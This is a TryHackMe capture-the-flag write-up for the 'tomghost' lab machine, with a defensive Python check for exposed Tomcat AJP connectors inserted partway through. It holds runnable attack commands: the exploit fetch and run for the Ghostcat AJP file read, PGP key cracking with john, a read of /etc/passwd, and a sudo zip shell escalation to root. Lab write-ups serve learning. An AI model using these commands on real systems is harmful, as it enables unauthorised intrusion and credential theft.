TryHackMe: tomghost

ratiros01
Jul 13, 2020

[Enumeration]

1. Port scan

nmap -Pn <ip>

2. OS and service scan

nmap -A -p 22,53,8009,8080 <ip>

This machine has Ubuntu Linux, Apache JServ, and Apache Tomcat 9.0.30.

3. Vulnerability scan

nmap --script vuln <ip>

4. Access HTTP site on port 8080

Click Manager App. If I’m lucky enough, I can access it and upload a reverse shell.

Failed!!! 403 Access Denied!!! I have to find another way.

[Exploitation]

1. Search for an exploit

searchsploit tomcat 9

Copy it

searchsploit -m 41783

Read it. Seems like I cannot use this exploit because the current Tomcat version is 9.0.30.

Let’s search in exploit-db with “tomcat”

This one is the newest.

Seems like this CVE can do LFI and read some data in tomcat-ajp.

Download it.

wget https://www.exploit-db.com/download/48143

Run the script

python 48143 <target ip>

Seems like I have a credential.
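
A defender's view of the finding above, as an added example that is not part of the original write-up: a Python check that audits a Tomcat 9.0.x server.xml for AJP connectors that are reachable off-host or accept requests without a shared secret. The sample configurations are constructed, and the check assumes the 9.0.x line only, where 9.0.31 changed the AJP defaults to a loopback bind and a required secret.

```python
import xml.etree.ElementTree as ET

# Constructed sample server.xml fragments (not taken from the target machine).
EXPOSED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

HARDENED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="CHANGE-ME-long-random-value"/>
</Service></Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def version_tuple(version):
    return tuple(int(part) for part in version.split("."))

def audit_ajp(server_xml, tomcat_version):
    """Return a list of findings for the AJP connectors in a Tomcat 9.0.x server.xml."""
    # Assumption: only the 9.0.x line is handled; 9.0.31 introduced the safer AJP defaults.
    safe_defaults = version_tuple(tomcat_version) >= (9, 0, 31)
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        # A Connector without a protocol attribute is HTTP/1.1, not AJP.
        if "ajp" not in conn.get("protocol", "HTTP/1.1").lower():
            continue
        port = conn.get("port", "?")
        # Before 9.0.31 an AJP connector without "address" listens on all interfaces.
        address = conn.get("address", "127.0.0.1" if safe_defaults else "0.0.0.0")
        # "requiredSecret" is the older name of the "secret" attribute.
        secret = conn.get("secret") or conn.get("requiredSecret")
        # secretRequired is only honoured from 9.0.31 on, where it defaults to true.
        required = safe_defaults and conn.get("secretRequired", "true").lower() == "true"
        if address not in LOOPBACK:
            findings.append(f"AJP port {port} listens on {address}, not loopback")
        if not secret and not required:
            findings.append(f"AJP port {port} accepts requests without a shared secret")
    if findings and not safe_defaults:
        findings.append(f"Tomcat {tomcat_version} predates the 9.0.31 AJP hardening")
    return findings

if __name__ == "__main__":
    for name, xml, ver in (("exposed", EXPOSED, "9.0.30"), ("hardened", HARDENED, "9.0.31")):
        print(name, audit_ajp(xml, ver) or "no findings")
```

If AJP is not used by a front-end proxy at all, removing the connector and blocking port 8009 at the firewall is simpler than hardening it.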

2. Try to login

ssh skyfuck@<ip>

3. Explore the machine

ls 

There are 2 files: credential.pgp and tryhackme.asc.

cat /etc/passwd

There are 3 users: root, merlin, and skyfuck.

Try to login as merlin

su merlin

Failed!!!

Explore merlin’s directory

cd /home
ls
cd merlin
ls
cat user.txt

[Privilege Escalation]

1. Verify sudo rights

sudo -l

skyfuck can’t run sudo.

2. Verify SUID

Not much that is useful.

3. Verify cronjob

crontab -e

Nothing

Seems like I can’t do much with skyfuck. I have to escalate to merlin.

4. Use FileZilla to download the files in /home/skyfuck with skyfuck’s credentials.

5. Decrypt the file

Since it’s a PGP file, I have to research. I came across this:

gpg2john credential.pgp

Seems like I failed.

gpg2john tryhackme.asc

Success!!!

Save as a file

gpg2john tryhackme.asc > hash

Crack password

john --wordlist=rockyou.txt hash
john hash --show

Now I have the password for the PGP file.

Import the PGP key and decrypt

gpg --import tryhackme.asc
gpg --decrypt credential.pgp

Now I have merlin’s password.

6. Login as merlin

su merlin

Success!!!

7. Verify sudo

sudo -l

8. Escalate to root using zip

Reference:

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

Now I’m root.

9. Find root.txt

cd /root
ls
cat root.txt